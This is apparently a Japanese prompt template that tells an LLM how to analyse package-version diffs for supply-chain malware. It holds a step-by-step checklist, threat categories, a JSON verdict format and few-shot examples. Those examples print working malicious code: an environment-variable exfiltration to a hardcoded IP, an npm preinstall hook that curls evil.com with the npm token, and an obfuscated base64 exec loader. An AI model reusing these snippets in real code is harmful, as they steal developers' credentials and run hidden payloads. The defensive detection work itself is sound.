あなたはソフトウェアサプライチェーンセキュリティの専門家です。
以下のdiff（チャンク {chunk_index}/{total_chunks}）を詳細に分析してください。

## 対象パッケージ
- エコシステム: {ecosystem}
- パッケージ名: {package_name}
- バージョン変更: {old_version} → {new_version}

{pre_analysis_context}

---

## 分析手順（Chain-of-Thought — 必ずこの順序で思考すること）

### Step 1: ネットワーク呼び出しを列挙せよ
追加行（+で始まる行）の中で、外部へのネットワーク接続を行う可能性があるコードをすべて列挙する。
- urllib, requests, http.client, socket, aiohttp, httpx, fetch, XMLHttpRequest, axios など
- ハードコードされたURL・IPアドレスを含む行

### Step 2: 認証情報・機密データアクセスを列挙せよ
- os.environ, os.getenv, process.env でAPIキー・パスワード・トークンを読む行
- ~/.ssh/, ~/.aws/, ~/.config/ などの認証情報ファイルを読む行
- ブラウザのCookieストア、パスワードマネージャーへのアクセス

### Step 3: コード実行・難読化を列挙せよ
- exec(), eval(), compile() の使用
- base64/hex/rot13でエンコードされた文字列 + デコード後の実行
- getattr()を使った関数名の難読化
- chr()連結やunicode escapeによる文字列構築

### Step 4: インストール時実行フックを確認せよ
- setup.py の cmdclass, install_requires, entry_points
- package.json の scripts.postinstall, scripts.preinstall, scripts.install
- binding.gyp の追加

### Step 5: Step 1〜4の結果を接続せよ
Step 1（ネットワーク）とStep 2（機密データ）が接続されているか？
→ 接続あり = EXFILTRATION (CRITICAL)

Step 3（コード実行）があり、難読化されているか？
→ あり = OBFUSCATION (HIGH以上)

Step 4（インストールフック）にStep 3の実行コードが含まれるか？
→ あり = BUILD_HOOK_ABUSE (CRITICAL)

---

## 過去の実際の攻撃例（Few-shot）

### PyPI: ctx 0.2.1 (EXFILTRATION)
```diff
+import base64, urllib.request
+_d = lambda: urllib.request.urlopen(urllib.request.Request(
+    'http://195.123.234.11:8080/c',
+    data=base64.b64encode('\n'.join(f'{k}={v}' for k,v in __import__('os').environ.items()).encode())
+))
+_d()
```
Step1: urllib.request → 外部IP。Step2: os.environ 全読み。Step3: base64エンコード。Step5: 1+2接続 → CRITICAL EXFILTRATION。

### npm: ua-parser-js 0.7.29 (BUILD_HOOK_ABUSE)
```diff
+"scripts": {
+  "preinstall": "node -e \"const cp=require('child_process');cp.exec('curl http://evil.com/'+process.env.npm_token);\""
+}
```
Step4: preinstall追加。Step1: curl外部送信。Step2: npm_token読み取り。Step5: 全接続 → CRITICAL BUILD_HOOK_ABUSE + EXFILTRATION。

### PyPI: getattr難読化 (OBFUSCATION)
```diff
+_f = getattr(__builtins__, 'ex' + 'ec')
+_f(compile(__import__('base64').b64decode(PAYLOAD), '<s>', 'exec'))
```
Step3: getattr難読化 + base64デコード + exec。Step5: 難読化あり → CRITICAL OBFUSCATION。

---

## 脅威カテゴリ
1. OBFUSCATION (CWE-506) / 2. NETWORK (CWE-913) / 3. PERSISTENCE (CWE-693)
4. EXFILTRATION (CWE-200) / 5. EXECUTION (CWE-78) / 6. STEGANOGRAPHY (CWE-116)
7. TYPOSQUATTING (CWE-1021) / 8. DEPENDENCY_CONFUSION (CWE-1021)
9. BUILD_HOOK_ABUSE (CWE-829) / 10. METADATA_MANIPULATION (CWE-345)

---

## 出力フォーマット
Step 1〜5 の思考結果を経て、最終判定を以下のJSON形式のみで出力（前後に文章・```不要）:
{{
  "verdict": "MALICIOUS",
  "severity": "CRITICAL",
  "confidence": 0.97,
  "findings": [
    {{
      "category": "EXFILTRATION",
      "description": "Step2で検出した環境変数がStep1の外部URLに送信される（Step5で接続確認）",
      "file": "pkg/__init__.py",
      "line_start": 5,
      "line_end": 12,
      "evidence": "urllib.request.urlopen('http://1.2.3.4')",
      "cwe": "CWE-200",
      "severity": "CRITICAL"
    }}
  ],
  "summary": "総合評価（日本語・200文字以内）"
}}

findingsが空なら []
verdict: MALICIOUS（確実）/ SUSPICIOUS（疑わしい）/ BENIGN（問題なし）/ UNKNOWN（判断不能）

---
{diff_chunk}
